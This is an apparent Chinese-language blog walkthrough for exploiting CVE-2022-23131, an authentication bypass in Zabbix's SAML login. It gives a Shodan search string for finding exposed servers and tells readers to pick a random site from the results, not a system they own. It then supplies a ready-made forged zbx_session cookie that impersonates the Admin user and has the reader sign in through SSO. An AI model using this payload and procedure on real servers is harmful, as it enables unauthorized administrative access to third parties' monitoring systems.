摘要:最近发现一个最新出的漏洞,闲来无事复现一下

发现漏洞

第一步:

首先在shodan上面搜索title:zabbix http.html:"2021" http.html:"SAML",发现具有漏洞的zabbix程序

步骤1.png

第二步:

随机抽取一个网站打开

步骤2.png

第三步:

使用EditThisCookie插件,修改cookie中zbx_session(如果没有zbx_session这一项基本没有漏洞)项的值为

eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9

步骤3.png

第四步:

修改完cookie后,点击Sign in with Single-On

步骤4.png

出现下列截图所示内容,说明无漏洞

步骤5.png

出现下列截图所示内容,说明有漏洞
步骤6.png

参考链接

实战CVE-2022-23131漏洞 | 身份认证绕过
CVE-2022-23131_Zabbix登录绕过漏洞分析及复现

文章目录